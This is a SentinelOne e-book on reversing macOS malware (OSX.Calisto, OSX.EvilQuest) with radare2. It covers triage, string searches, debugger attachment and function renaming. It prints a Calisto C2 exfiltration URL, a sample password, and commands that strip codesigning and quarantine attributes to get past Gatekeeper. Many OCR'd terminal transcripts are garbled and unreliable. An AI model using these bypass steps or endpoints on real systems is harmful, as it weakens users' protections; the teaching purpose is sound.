SentinelOne 


A Security 
Practitioner’s 
Guide to 
Reversing 
macOS Malware 
with Radare2 


By Phil Stokes 


September 2023 


Table of Contents 


Introduction 3 
Why Use radare2 (r2) for macOS Malware Analysis? 3 
Prerequisites 4 
Getting Started with macOS Malware Triage 4 
Defeating macOS Malware Anti-Analysis Tricks with Radare2 13 
Techniques for String Decryption in macOS Malware with Radare2 25 
macOS Malware Hunting with radare2 | Leveraging XREFS, YARA and Zignatures 39 
Delivering Faster macOS Malware Analysis With r2 Customization 50 
Automating String Decryption and Other Reverse 

Engineering Tasks in radare2 With r2pipe 62 
Soseees 70 
References and Further Reading 71 


Ol 


O2 


SENTINELONE E-BOOK 


Introduction 


In our previous foray into macOS malware reverse engineering, we guided those new to the field 
through the basics of static and dynamic analysis using nothing other than native tools such as 
strings, otool and 1ldb. In this eBook, we move into more advanced techniques, introducing 
further tools and covering a wide range of real-world malware samples from commodity adware to 
trojans, backdoors, and spyware used by APT actors such as Lazarus and OceanLotus. 


Throughout, we'll be using a free reverse engineering suite called radare2, or r2 for short. In the 
following pages, you will find practical tips with examples on how to use r2 to deal with macOS 
malware that deploys anti-analysis techniques, how to decrypt encrypted strings, how to compare 
and diff binaries, and how to write and iterate your YARA hunting rules. You will also learn how to 
customize and automate your r2 set up to make malware triage and analysis simpler and faster. 


Why Use radare2 (r2) for 
macOS Malware Analysis? 


Before we dive in, I do want to say a little bit about why r2 is a good choice for macOS malware 
analysis, as I expect at least some readers are likely already familiar with other tools such as IDA, 
Ghidra and perhaps even Hopper, and may be asking that question from the outset. 


Radare2 is an extremely powerful and customizable reversing platform, and — at least the way I use 
it — a great deal of that power comes from the very feature that puts some people off: it’s a command 
line tool rather than a GUI tool. 


Because of that, r2 is very fast, lightweight, and stable. You can install and run it very quickly in anew 
VM without having to worry about dependencies or licensing (the latter, because it’s free) and it’s 
much less likely (in my experience) to crash on you or corrupt a file or refuse to start. And as we'll see 
in the tips below, you can triage a binary with it very quickly indeed! 


Moreover, because it’s a command line tool, it integrates very easily with other command line tools 
that you are likely familiar with, including things like grep, awk, diff and so on. Other tools typically 
require you to develop separate scripts in Python or Java to do various tailored tasks, but with r2 you 
can often accomplish the same just by piping output through familiar command line tools (we'll be 
looking at some examples of doing that below). 


Finally, because r2 is free, multi-platform and runs on pretty much anything at all that can runa terminal 
emulator, learning how to reverse with r2 is a transferable skill you can take advantage of anywhere. 


Enough of the hard sell, let’s get down to triaging some malware! In this chapter, we’re going to look 
at amalware sample called OSX.Calisto. Be sure to set up an isolated VM, download the sample from 


here (password:infect3d) and install r2. 


Then, let’s get started! 


A SECURITY PRACTITIONER’S GUIDE TO REVERSING MACOS MALWARE WITH RADARE2 3 


OS 


04 


Prerequisites 


If you are entirely new to either malware analysis or radare2, then it’s important to read this section 
and work through the recommendations relevant to you. If you already have a lab environment and 
have played around with r2 before at any level, you can skip to the next chapter. 


Environment 


It’s absolutely necessary to have an isolated virtual machine (VM) set up when dealing with malware. 
In some cases, we'll be detonating our malware samples to inspect and manipulate it during 
execution, and you do not want that malware running on your own system. Even in cases where we 
are conducting static analysis - inspecting the file’s disassembled code, you still want to be doing this 
inside a VM to avoid accidental executions, not to mention avoiding having your own anti-malware 
software (because you are using some, right?) flagging your computer as ‘infected’. 


I discussed VM setups in our previous free eBook, so please see the advice there if you do not already 
have a working lab. 


Secondly, you’ll need to install radare2. There’s a few options. You can install it with MacPorts, or with 
Brew, or if you don’t want those overheads directly from github with the following commands: 


git clone https://github.com/radareorg/radarez? ; 
radare2/sys/install.sh 


If you take this latter option, you can also use the second of those commands to update r2 whenever 
you wish. 


Basic r2 orientation and operation 


There are many introductory blogs on using r2. However, most such posts are aimed at CTF/crackme 
readers and typically showcase simple ELF or PE binaries. Very few are aimed at malware analysts, 
and even fewer still are aimed at macOS malware analysts, so they are not much use to us froma 
practical point of view. 


There are two notable exceptions, and before diving into the material here, I recommend having a 
look at these posts: 1, 2. The first one in particular should give you enough to be able to start on the 
material presented below if you are entirely new to radare2. 


Getting Started with 
macOS Malware Triage 


We kick off with a walk-through on how to rapidly triage a new sample. Analysts are busy people, 
and the majority of malware samples you have to deal with are neither that interesting nor that 
complicated. We don’t want to get stuck in the weeds reversing lots of unnecessary code only to find 
out that the sample really wasn’t worth that much effort! 


A SECURITY PRACTITIONER'S GUIDE TO REVERSING MACOS MALWARE WITH RADAREZ 


Load and analyze 
macOS malware 
sample with radare2 


Ideally, we want to get a sample “triaged” in just a few minutes, where “triage” means that we 
understand the basics of the malware’s behavior and objectives, collecting just enough data to be 
able to effectively hunt for related samples and detect them in our environments. For those rarer 
samples that pique our interest and look like they need deeper analysis, we want our triage session to 
give an overall profile of the sample and indicate areas for further investigation. 


Fun with Functions, Calls, XREFS and More 


Malware Name: OSX.Calisto 

File Type: Mach-O 

SHA1: e7324478afc9092e1aaf1d50f7d03470d1416c2a 
Sources: Malshare, VirusTotal 


Our first sample, OSX.Calisto, is a backdoor that tries to exfiltrate the user’s keychain, username and 
clear text copy of the login password. The first tip about using r2 quickly is to load your sample with 
the -AA option, like so: 


% r2 -AA calisto 


+ lab ls -al 

total 240 
drwxr-xr-x 3 sphil staff 96 30 Aug 20:48 . 
drwxr-xr-x 44 sphil staff 1408 30 Aug 20:48 .. 
rwxr-xr-x 1 sphil staff 120400 30 Aug 20:48 calistc 
lab PZ =AA calisto 

Analyze all flags starting with sym. and entry®@ (aa) 
Analyze function calls (aac) 

Analyze len bytes of instructions for references (Caar) 
Check for objc references 

Parsing metadata in ObjC to find hidden xrefs 

A total of @ xref were found 

Set 71 dwords at 0x100015d40 

Check for vtables 

Type matching analysis for all functions Caaft) 
Propagate noreturn information 


C 
C 
C 
[x 
[x 
[x 
[x 


Use -AA or aaaa to perform additional experimental analysis. 
Finding function preludes 

Enable constraint types analysis for variables 

ESIL ruined my life 


This performs the same analysis as loading the file and then running aaa from within r2. It’s not only 
faster to do it in one step, it also cuts out the possibility of forgetting to run the analysis command 
after loading the binary. 


Now that our Calisto sample is loaded and analyzed, the first thing that we should do is list all the 
functions in verbose mode with af 11. 


List all functions, 
displaying stats for 
Calls, locals, args, 
and xrefs for each 


Function table 
sorted by calls 


What is particularly useful about this command is that it gives a great overview of the malware. Not 
only can we see all the function calls, we can see which are imports, which are dead code, which are 
making the most system calls, which take the most (or least) arguments, how many variables each 
declares and more. From here, we are in a very good position to see both what the malware does and 
where it does it. 


2x020200010201 6 3 @x0@0000010001 4x0200200 10281262 @ sym. imp. swift_once 
@x000000201020124<4 6 3 @x02000001000104<4 6 8x02000001000104<c0 © syn. imp. NSApplicetionMcin 


@x020200010201248e 3 0x020000010001048e 6 x0209000100010494 CFStringGetCStringPtr 
(@x02020002 102012494 6 3 @xd000000100012494 6 8x0@0000010001249c PathAddLineToPoint 
@x9200200102010492 6 3 @xO200@O010001049¢ 6 -axaeoRR00100010400 imp. hCloseSubpath 

@x920200010201 0400 6 @x02000001000104a6 athCreateMutable 
@xO202802102018405 6 4 6 6 Bxageveee1020124ac ; PathMoveToPoint 
@xoeoneoeloeele4ac 6 6 @x92000001000104b2 : WindowLevelForkey 
@x92020001020104b?2 > 6 @x02000001000104b8 © sym. imp, IORegistryEntryCreateCFProperty 
@xO2O2@0B1028124b8 6 d = 6 Bx02098001020284be © sym. imp. 10ServiceGetMatchingService 
@xO2OR@0R1020104be 6 6 @x92002001000104¢4 © syn. imp. 10ServiceMatching 
@xOAORBOR10RO1R4ca «6 A 6 @x020920010001 0402 ? © sym. imp, NSUserName 

@xe202e08102012422 6 3 @xogooeoa10ee1e422 6 exegeveoe 100810428 © syn. imp. _Block_copy 

exovoneoe102e1e4de == 6 3 @xogeoeoo1overesde § —-«&-@xOgOROR100E104d6 © sym. imp. Foundation. _convertArrayToNSArray 


Even from just the top of that list, we can see that this malware makes a lot of calls to NSUserName. 
Typically, though, we will want to sort that table. Although r2 has an internal function for sorting the 
function table (af1t), I have not found the output to be reliable. 


Fortunately, there is another way, which will introduce us to a more general “power feature” of r2. 
This is to pipe the output of af 11 through awk and sort. Say, for example, we would like to sort only 
select columns (we don’t want all that noisy data!): 


afll | awk ‘{print $15 " calls: " $10" locals: "$11" args: "$12" xrefs: 
"$13}' | sort -k 3 -n 


Here we pipe the output through awk, selecting only the columns we want and then pipe and 
sort on the third column (number of calls). We add the -n option to make the sort numerical. We can 
reverse the sort with -r. 


sym. func. 18000bbad : locals: 5 args: 4 xrefs: 
sym. func .180002d40 : locals: 25 args: 

sym. func . 100003270 : locals: 7 args: 

sym. func . 180005380 : 25 locals: 7 args: ; 

sym. func. 10000a220 locals: 7 args: 

sym. func. 180008300 : locals: 28 args: 

sym, func . 100089ba0 : 29 locals: 9 args: 

sym. func. 180002890 : locals: 26 args: 

sym. func . 10000830 : locals: 14 args: 

sym. func. 10@@8e3eb g locals: @ args: 

sym, func. 100001400 : locals: 41 args: 

sym. func. 100003790 : locals: 38 args: 

sym. Func. 1000043F@ c : locals: 3 args: 

sym. func. 100007750 : locals: 42 args: 

sym. Func .10000b1d0 : locals: 43 args: 

sym. func. 10@@01df@ : locals: 56 args: 

sym. func. 100000400 : 111 locals: 52 args: 2 xrefs: 2 
sym. func. 100@0@b030 : 125 locals: 51 args: 2 xrefs: 1 
sym. Func . 100005620 : 308 locals: 147 args: 2 xrefs: 2 
[@x10000a170]> 


Note that we never left r2 throughout this whole process, making the whole thing extremely 
convenient. If we wanted to do the same and output the results to file, just do that as you would 
normally on the command line witha > <path_to_file>. 


Sorting output 
from radare2 


Quickly Dive Into a Function’s Calls 


Having found something of interest, we will naturally want to take a quick look at it to see if our hunch 
is right. We can do that rapidly in a couple of ways as the next few tips will show. 


Normally, from that function table, it would make sense to look for functions that have a particular 
profile such as lots of calls, args, and/or xrefs, and then look at those particular functions in more detail. 


Back in our Calisto example, we noted there was one function that had a lot of calls: 
sym. func .100005628, but we don’t necessarily want to spend time looking at that function if 
those calls aren’t doing anything interesting. 


We can get a look at what calls a function makes very quickly just by typing in a variant of the af11 
command, af 1m. You might want to just punch that in and see what it outputs. 


Yeah, useful, but overwhelming! As we noted in the previous section, we can easily filter things with 
command line tools while still in r2, so we could pipe that output to grep. But how many lines should 
we grep after the pattern? For example, try 

aflm | grep -A 100 5620: 

You'll shoot way over target because although there may be more calls in that function, af 1m only 
lists each unique call. A better way is to pipe through sed and tell it to stop piping when it hits another 
colon (signaling another function listing). 


aflm | sed -n '/5620:/,/:/p' 


The above command says “search for the pattern 5629:, keep going (/, /) until you find the next 
colon (/:/)”. The final /p tells sed to print all that it found. 


You'll get an output like this: 


Filtering strings in radare2 


Now we can see all the calls that this huge function makes. From that alone we can infer that 
this function appears to grab the User name, does some string searching, possibly builds an array 
out of what it finds, and then uploads some data to a remote server. And we haven’t even done 
any disassembly yet! 


Strings on Steroids 


At this point, we might want to go back to the function table and repeat the above steps on a few 
different functions, but we also have another option. Having seen that NSUserName is called on 
multiple occasions, we might want to look more closely at how the malware is interacting with the 
user. As we explained in our previous guide on reversing macOS malware, extracting strings from a 
binary can give you a very good insight into what the malware is up to, so much so that some malware 
authors take great efforts to obfuscate and encrypt the binary’s strings (something we'll be looking at 
in a later chapter). Fortunately, the author of Calisto wasn’t one of those. Let’s see how we can use r2 
to help us with string analysis. 


The main command for dumping strings is 
1ZZ 


However, that dump isn’t pretty and doesn’t make for easy analysis. Fortunately, there’s a much nicer 
way to look at and filter strings in radare2. Let’s try this instead: 


E22 «x 


The tilde is r2’s internal “grep” command, but more importantly the three periods pipe the string 
dump into a “HUD” (Heads Up Display) from where we can type filter characters. 


For example, after issuing the above command, type asingle / to reveal all strings containing a forward 


slash (like paths and URLs, for example). Backspace to clear that and try other filters in turn like “http” 
and “user”. As the images below show, we quickly hit pay dirt! 


2 -AA calisto 


http! 

42 @x00012840 @ 40 133 134 4,__TEXT._cstring ascii The software package appears to be invalid. Pleas 
43 @x@00128d0 0 dO ¢ 49 4.__TEXT.__cstring sc /4®.87.56.192/calisto/upload.php?username= 
81 0x@0013000 0x10001 41 4.__TEXT.__estring s /48.87.56.192/calisto/Listenyee.php 


The first image above looks like a lead on the malware’s C2 addresses, while the second shows us 
what looks very much like a path the malware is going to write data to. Both of these are ideal for our 
IoCs and for hunting, subject to further confirmation. 


Fast Seek and Disassembly 


What we've found after just a few short commands and acouple of minutes of triaging our binary is very 
promising. Let’s see if we can dig a little deeper. Our output from the HUD gives us the addresses of 
all those strings. Let’s take a look at the address for what looks like uploading exfiltrated data to a C2: 


http:[//]40.87.56[ .]192/calisto/upload.php?username=" 


From the output, we can see that this string is referenced at 0x1000128d8. Let’s go to that address 
and see what we have. First, double-click the address to select it then copy it with Cmd-C. To escape 
the HUD, hit ‘return’ so that you are returned to the r2 prompt. 


Next, we’ll invoke the ‘seek’ command, which is simply the letter s, and paste the address after it. 
Hit ‘return’. Type pd (print disassembly) and scroll up in your Terminal window to get to the start 
of the disassembly. 


S 0x1000128d0 
pd 


sym. func. 100005620 @ @x1000@6dce 


.string 


.String 


.string 


Seeking in radare2 


The disassembly shows us where the string is called via the xref at the top. Let’s again select and 
Cmd-C that address and do another seek. After the seek, this time we'll do pdf. 


S sym. func. 100005620 
pdf 
Do you want to print 1866 Lines? (y/N) y 


7915: Cint64_t argl, int64_t arg4); 


Disassembling a 
function in radare2 


SENTINELONE E-BOOK 


The difference is that pdf will disassemble an entire function, no matter how long it is. On the other 
hand, pd will disassemble a given number of instructions. Thus, it’s good to know both. You can’t 
use pdf from an address that isn’t a function, and sometimes you want to just disassemble a limited 
number of instructions: this is where pd comes in handy. However, when what you want is a complete 
function’s disassembly, pdf is your friend. 


The pdf command gives you exactly what you’d expect from a disassembler, and if you’ve done any 
reversing before or even just read some r2 intros as suggested above, you'll recognize this output (as 
pretty much all r2 intros start with pdf!). In any case, from here you can get a pretty good overview of 
what the function does, and r2 is nicer than some other disassemblers in that things like stack strings 
are shown by default. 

You might also like to experiment with pdc. This is a “not very good” pseudocode output. One of r2’s 
weaker points, it has to be said, is the ability to render disassembly in good pseudocode, but pdc can 
sometimes be helpful for focus. 

Finally, before we move on to the next tip, I’m just going to give you a variation on something we 
mentioned above that I often like to do with pdf, whichis to grep the calls out of it. This is particularly 
useful for really big functions. In other words, try: 


pdf~call 


for a quick look at the calls in a given function. You can also get r2 to give you a summary of a 
function with pds. 


Rabin2 | Master of Binary Info Extraction 


When we discussed strings, I mentioned the izz command, which is a child of the iz command, 
which in turn is a child of r2’s i command. As you might have guessed, i stands for information, and 
the various incantations of i are all very useful while you’re in the middle of analysis (if you happen to 
forget what file you are analyzing, i~file is your friend!). 
Some of the useful variants of the i command are as follows: 

1. get file metadata [i] 

2. look at what libraries it imports [ii] 

3. look at what strings it contains [iz] 

4. look at what classes/functions/methods it contains [icc] 

5. find the entrypoint [ie] 
However, for rapid triage, there is a much better way to get a bird’s eye view of everything there is to 
know about a file. When you installed r2, you also installed a bunch of other utilities that r2 makes 


use of but which you can call independently. Perhaps the most useful of these is rabin2. In a new 
Terminal window, tryman rabin2 to see its options. 


A SECURITY PRACTITIONER’S GUIDE TO REVERSING MACOS MALWARE WITH RADARE2 10 


Triaging macOS 
malware with rabin2 


While we can take advantage of rabin2’s power via the i command in r2, we can get more juice 
out of it by opening a separate Terminal window and calling rabin2 directly on our malware sample. 
For our purposes, focused as we are on rapid triage, the only rabin2 option we need to know is: 


% rabin2 -g <path_to_binary> 


+ lab rabin2 -g calisto 
[Sections] 


nth paddr size vaddr vsize name 


Q@x@00010b@ Oxf336 Ox1000010b®@ @xf336 
@x000103e6 Ox34e 0x1000103e6 Ox34e 
@x@0010734 @x592 @x100010734 x592 .__TEXT.__stub_helper 

@x@001@cc6 Oxb62 Ox100010cc6 Oxb62 TEXT.__objc_methname 


@.__TEXT.__text 
1 
2 
3 
@x@0011830 @x22a6 0x100011830 @x22a6 4,__TEXT.__cstring 
5 
6 
ri 
8 
9 


.__TEXT. stubs 


@x0@0013ae0 @x1c®@ @x100013ae0 Oxicd .__TEXT.__const 
@x00013cad @x48 0x100013cad @x48 TEXT.__objc_cLassname 
@x00013ce8 @x36 0x100013ce8 Q@x36 TEXT.__objc_methtype 
@x00013d20 @x274 @x100013d20 Qx274 .__ TEXT, _unwind_info 
@x00013f98 @x6@ 0x100013f98 Q@x60 .__TEXT.__eh_frame 
Qx00014000 Qx10 0x100014000 Q@x10 10.__DATA.__nl_symbol_ptr 
@x00014010 Ox1d@ 0x100014010 x1d0 11.__DATA.__got 
0x0@00141e0 Q@x468 @x1000141e0 0x468 12.__DATA.__la_symbol_ptr 
@x@0014650 x16@ 0x100014650 9%x160 (- 13,__DATA,__const 


Q 
1 
2 
3 
4 
a 
6 
7 
8 
9 


The -g option outputs everything there is to know about the file, including strings, symbols, sections, 
imports, and such things like whether the file is stripped, what language it was written in, and so on. 
It is essentially all of the options of r2’s 1 command rolled into one. 


Strangely, one of the best outputs from rabin2 is when its -g option outputs almost nothing at all! 
That tells you that you are almost certainly dealing with packed malware, and that in itself is a great 


guide on where to go next in your investigation. 


Meanwhile, it’s time to introduce our last rapid analysis pro trick, Visual Graph mode! 


Visual Graph Mode 


For those of you used to a GUI disassembler, if you’ve followed this far you may well be thinking... 
“ahuh...but how do I get a function call graph from a command line tool?” A graph is often a make 
or break deal when trying to triage malware rapidly, and a tool that doesn’t have one is probably not 
going to win many friends. Fortunately, r2 has you covered! 


Returning to our r2 prompt, type VV (double V) to enter visual graph mode. 


radare2 graph mode 


@]> 0x10000a170 # entry® Cint64_t argl, int64_t arg2); 


argi, int64_t arg2); 


@x10@080192 [oc] 


@x10002a105 [oe] 


@x10800a1a0S 8beS649F00. mov 


Visual graph mode is super useful for being able to trace logic paths through a malware sample 
and to see which paths are worth further investigation. I will readily admit that learning your way 
around the navigation options takes some practice. However, it is an extremely useful tool and one 
which I frequently return to with samples that attempt to obstruct analysis. 


The options for using Visual Graph mode are nicely laid out here. Once you learn your way around, 
it’s relatively simple and powerful, but it’s also easy to get lost when you’re first starting out. Like Vi 
and Vim, inexperienced users can sometimes find themselves trapped in an endless world of error 
beeps with r2’s Visual Graph mode. However, as with all things in r2, whenever you find yourself 
“stuck”, hit q on the keyboard (repeatedly, if needs be). If you find yourself needing help, hit ?. 


I highly recommend that you experiment with the Calisto sample to familiarize yourself with 
how it works. In the next Chapter, we'll be looking in more detail at how Visual Graph mode 
can help us when we tackle anti-analysis measures, so give yourself a heads up by playing around 
with it in the meantime. 


Summary 


In this chapter, we’ve looked at how to use radare2 to quickly triage macOS malware samples, seen 
how it can easily be integrated with other command line tools most malware analysts are already 
familiar with, and caught a glimpse of its visual graph mode. 


There’s much more to learn about radare2 and macOS malware, and while we hope you’ve enjoyed 
the tips we’ve shared here, there’s many more ways to use this amazing tool to achieve your aims in 
reversing macOS malware. 


O5 


Defeating macOS Malware 
Anti-Analysis Tricks with Radare2 


In this chapter, we start our journey into tackling common challenges when dealing with macOS 
malware samples. Along the way, we'll pick up tips on both how to beat obstacles put in place by 
malware authors and how to use r2 more productively. 


Although we can achieve a lot from static analysis, sometimes it can be more efficient to execute the 
malware in a controlled environment and conduct dynamic analysis. Malware authors, however, may 
have other ideas and can set up various roadblocks to stop us doing exactly that. Consequently, one of 
the first challenges we often have to overcome is working around these attempts to prevent execution 
in our safe environment. 


In this chapter, we’ll look at how to circumvent the malware author’s control flow to avoid executing 
unwanted parts of their code, learning along the way how to take advantage of some nice features of 
the r2 debugger! We'll be looking at a sample of EvilQuest (password: infect3d), so fire up your VM 
and download it before reading on. 


Anote for the unwary: if you’re using Safari in your VM to download the file and you see “decompression 
failed”, go to Safari Preferences and turn off the ‘Open “safe” files after downloading’ option in the 
General tab and try the download again. 


Getting Started With the radare2 Debugger 


Malware Name: OSX.EvilQuest 

File Type: Mach-O 

SHA1: efbb681a61967e6f5a811f8649ec26efe1 6f50ae 
Sources: Malshare, VirusTotal 


Our sample hit the headlines in July 2020, largely because at first glance it appeared to be a rare 
example of macOS ransomware. SentinelLabs quickly analyzed it and produced a decryptor to help 
any potential victims, but it turned out the malware was not very effective in the wild. 


It may wellhave beena PoC, ora project stillin early development stages, as the code and functionality 
have the look and feel of someone experimenting with how to achieve various attacker objectives. 
However, that’s all good news for us, as EvilQuest implements several anti-analysis features that will 
serve us as good practice. 


The first thing you will want to do is remove any extended attributes and codesigning if the sample has 
a revoked signature. In this case, the sample isn’t signed at all, but if it were we could use: 


% sudo codesign --remove-signature <path to bundle or file> 


Failing to attach 
the debugger. 


If we need the sample to be codesigned for execution, we can also sign it (remember your VM needs 
to have installed the Xcode command line tools via xcode-select --instal]) with: 


% sudo codesign -fs - <path to bundle or file> --deep 
We'll remove the extended attributes to bypass Gatekeeper and Notarization checks with 
% xattr -re <path to bundle or file> 


And we'll attempt to attach to the radare2 debugger by adding the -d switch to our 
initialization command: 


% r2 -AA -d patch 


Unfortunately, our first attempt doesn’t go well. We already removed the extended attributes and 
codesigning isn’t the issue here, but the radare2 debugger fails to attach. 


qauser@reversing-Lab-10 ~ % cd ~/Downloads/EvilQuest 
auser@reversing-Lab-10 EvilQuest % ls -al 

total 21440 

drwxr-xr-x@ 5 quser staff 160 30 Jun 2020. 

drwx auser staff 64@ 2@ Sep 15:02 .. 
-rw-r--r--@ 1 auser staff 10880309 30 Jun 2020 Mixed In Key 8.dmg 
-rwxr-xr-x@ 1 auser admin 87928 27 Jun 2020 patch 
-rw-r--r--@ 1 quser staff 208 3@ Jun 2020 readme.txt 
auser@reversing-Lab-10 EvilQuest % shasum patch 
efbb681a61967e6F5a811F8649ec26efe16Ff5@ae patch 
auser@reversing-Lab-10 EvilQuest % r2 -AA -d patch 

Child killed 

unknown error in debug_attach 

Child killed 

ptrace: Cannot attach: Invalid argument 

Possibly unsigned r2. Please see doc/macos.md 

ERRNO: 22 CEINVAL) 

[w] Cannot open 'dbg://./patch' for writing. 
auser@reversing-Lab-10 EvilQuest % 


That ptrace: Cannot Attach: Invalid argument message looks ominous, but actually the 
error message is misleading. The problem is that we need elevated privileges to debug, so a simple 
sudo should get us past our current obstacle. 


The debugger needs 
elevated privileges 


Some of EvilQuest’s 
suspected anti-analysis 
functions 


auser@reversing-lab-10 EvilQuest % sudo r2 -AA -d patch 
Password: 
Analyze all flags starting with sym. and entry®@ (aa) 
Analyze function calls (aac) 
Analyze len bytes of instructions for references Caar) 
Check for objc references (aao) 
Finding and parsing C++ vtables (avrr) 


Skipping type matching analysis in debugger mode (Caaft) 
Propagate noreturn information (aanr) 
Finding function preludes 
Enable constraint types analysis for variables 
-- Helping siol merge? No way, that would be like.. way too much not lazy. - vi 
Fino 


[@x112ae0000]> 


Yay, attach success! Let’s take a look around before we start diving further into the debugger. 


Getting Started With the radare2 Debugger 


Let’s run af 11 as we did when analyzing OSX.Calisto previously, but this time we'll output the function 
list to file so that we can sort it and search it more conveniently without having to keep running the 
command or scrolling up in the Terminal window. 


> afll > functions.txt 


Looking through our text file, we can see there are a number of function names that could be related 
to some kind of anti-analysis. 


337 @x@0000001000057b1 744 sym.__eisl_ndebugging 
319 Ox00000001000058f fF 2 312 sym.__eisl_debugging_um 


Qx0000000100012866 
0x0000000100014bb6 
Ox0000000100014bbc 
0x0000000100014bc8 
> Q@x0000000100014c3a 
®x0000000100014c40 
0x0000000100014c46 
@x0000000100014c4c 
0x0000000100014c52 
> @x0000000100014cSe 
0x0000000100014c70 
> @x0000000100014c76 
@x®000000100014c7c 


..eisl_apply_function 
. imp ,__memcpy_chk 

. imp. __memset_chk 
.imp.__stack_chk_fail 
. imp. getenv 
.imp.geteuid 

. imp. gethostbyname 
.imp.gethostid 
.imp.getlogin 
.imp.getpid 

.imp.kill 

. imp. Kqueue 

. imp .mal Loc 


eesesoecooeoe oo or 
eeosoecooecoe oo on 
eesesoeooeoe ooo 
seeoeocoooecoe oo on 


NPRPUPRPPRPPR 


a 


We can see that some of these only have a single cross-reference, and if we dig into these using the 
command, we see the cross-reference (XREF) for the function happens to 
be , 80 that looks like a good place to start. 


Getting help on 
radare2’s axt command 


+_1s_executabDle sym._1S_aebdugging sym._1S5_virtuat_mchn sym._1S_carved 
is tabl ym. _is_debugging ym._is_virtual_mch ym._1S_\ ] 


sym._is_ debugging 
main 0x10000b89a [CALL] call sym._is_debugging 
sym._is_virtual_mchn 

ym._is_virtual_mchn 


Many commands in r2 
support tab expansion 


Here’s a useful powertrick for those already comfortable with r2. You can run any command ona 
for-each loop using @@. For example, with 


We can get the XREFS to any function containing the search term in one go. 


In this case I tell r2 to give me the XREFS for every function that contains “_is_”. Then Ido the same 
with “get”. Try to see more examples of what you can do with 


axt @@f:_is_ 
sym._get_targets @x10@@0e516 [CALL] call sym.__is_ target 
sym._ei_forensic_thread @x1000018d4 [DATA] lea rcx, [sym._is_lfsc_target 
sym. loader_thread 0x10000c9a8 [DATA] lea rex, [sym._i >cutable] 


sym._carve_target @x100@@eea8 [CALL] call sym._is_carved 
sym._uncarve_target 0x1000@f2c® [CALL] call sym._is_carved 
sym._ei_carver_main ®x1000@badd [DATA] lea rcx, [sym._is_file_target 
main @x10@00c586 [CALL] call sym._s_is_high_time 


GET: get 


sym. _check_if_running 0x10@00@7e9d [CALL] call sym.__get_process_list 
sym._kill_unwanted @x1000081e7 [CALL] call sym.__get_process_list 
sym.__check_if_targeted 0x10000a6a8 [CALL] call sym.__get_host_identifier 
sym._get_targets @x10000e516 [CALL] call sym.__is_target 

5 eiht_get_update 0x10000ad36 [CALL] call sym. ei get_host_info 


main @x1@@0@c2c1 [CALL] call sym._eiht_get_update 
main @x10@@0c56a [CALL] call sym._eiht_get_update 


Using a for-each main 0x10@@0c@74 [CALL] get 
in radare2 


Since we see that is_virtual_mchn is called in main, we should start by disassembling the 
entire main function to see what’s going on, but first I’m going to change the r2 color theme to 
something a bit more reader-friendly with the eco command (type eco and hit the tab key to see a 
list of available themes). 


eco focus 
pdf @ main 


Visual Graph Mode and Renaming 
Functions with Radare2 


< @x1000@bdcO 
@x10@0@bdc6 
@x1080@bdca 
@x10@00bdce 
@x1000@bdd5 
@x1080@bdda 
< 0x10000bddd 
®x10e00bde3 
< 0x10000bdea 


> 0x10000bdeF 
< @x10000bdf3 
0x1000@bdT9 
@x10000bdfd 
0x1000@bee1 
0x10@08be08 
@x10@08bebd 
@x1000@be10 
0x1000@be16 
0x10@0@beld 


> 0x1080Gbe22 
@x10080be26 
@x10008be2c 
0x10000be30 
@x10e08be34 
@x1000Obe3b 

| 0x10000be49 
< 0x10000be43 
@x1000@be49 


0x1000@be50 


< @x10000be55 


@x10@0@beSa 2 

@x1000@beSf sym._is_virtual_mchn 
@x10@0@be64 . 

@x1000@be67 x10 7 

@x1800@be6d , Oxttttfff 
@x10000be72 fcn.10000feb2 


As we scroll back up to the beginning of the function, we can see the disassembly provides pretty 
interesting reading. At the beginning of main, we can see some unnamed functions are called. We’re 
going to jump into Visual Graph mode and start renaming code as this will give us a good idea of the 
malware’s execution flow and indicate what we need to do to beat the anti-analysis. 


Hit VV to enter Visual Graph mode. I will try to walk you through the commands, but if you get lost 
at any point, don’t feel bad. It happens to us all and is part of the r2 learning curve! You can just quit 
out and start again if need be (part of the beauty of r2’s speed; you can also save your project: type 
uppercase P? to see project options). 


I prefer to view the graph as a horizontal, left-to-right flow; you can toggle between horizontal and 
vertical by pressing @ on your keyboard. 


nS 


WdDdLDI> Ox1veeddded F int mein (wint32_t argc, char seargv); 


call fen, 100@8T fos 


Ox1e0eeddes 
{ 


coll fen. 10000f fb4: 


Viewing the sample’s 
visual graph horizontally 


Here’s a quick summary of some useful commands (there are many more as you'll see 
if you play around): 


e hjkl(arrow keys) — move the graph around 

e -/+0- reduce, enlarge, return to default size 

e ‘—toggle graph comments 

e tab/shift-tab — move to next/previous function 

e q-back to visual mode 

e t/f— follow the true/false execution chain 

e u-go back 

e ?-help/available options 
Hit the ‘ key once or twice to make sure graph comments are on. 
Use the tab key to move to the first function after main() (the border will be highlighted), where 
we can see an unnamed function and a reference in square brackets that begins with the letter ‘o’ 
(for example, [ob], though it may be different in your sample). Type the letters (without the square 


brackets) to go to that function. Type p to rotate between different display modes till you see 
something similar to the next image. 


[0x10000f fb4] 
6: (); 
bp: ® (vars @, args Q) 


sp: ®@ (vars 0, args Q) 
rg: ® (vars @, args @) 
Qx10000f fb4 


As we can see, this function call is actually a call to the standard C library function strcmp ( ), so let’s 
rename it. 


Type dr and at the prompt type in the name you want to use and hit enter. Unsurprisingly, 
I’m going to call it strcmp. 


[@x10000f Fb4] 


6: int (const char *s1, const char +*s2); 


bp: ®@ (vars @, args Q) 
sp: ® (vars 0, args @) 
rg: @ (vars @, args @) 
Qx10000f fb4 


To return to the main graph, type u and you should see that all references to that previously unnamed 
function now show strcmp, making things much clearer. 


If you scroll through the graph (hjkl, remember) you will see many other unnamed functions that, 
once you explore them in the same way, are just relocations of standard C library calls such as exit, 
time, sleep, printf, malloc, srandom and more. I suggest you repeat the above exercise and 
rename as many as you can. This will both make the malware’s behavior easier to understand and 
build up some valuable muscle-memory for working in r2. 


Beating Anti-Analysis Without Patching 


There are two approaches you can take to interrupt a program’s designed logic. One is to identify 
functions you want to avoid and patch the binary statically. This is fairly easy to do in r2 and there’s 
quite a few tutorials on how to patch binaries already out there. We’re not going to look at patching 
today because our entire objective is to run the sample dynamically, so we might as well interact with 
the program dynamically as well. Patching is really only worth considering if you need to create a 
sample for repeated use that avoids some kind of unwanted behavior. 


We basically have two easy options in terms of affecting control flow dynamically. We can either 
execute the function but manipulate the returned value (like put O in rax instead of 1) or skip 
execution of the function altogether. 


We'll see just how easy it is to do each of these, but we should first think about the different 
consequences of each choice based on the malware we’re dealing with. 


If we NOP a function or skip over it, we’re going to lose any behavior or memory states invoked by that 
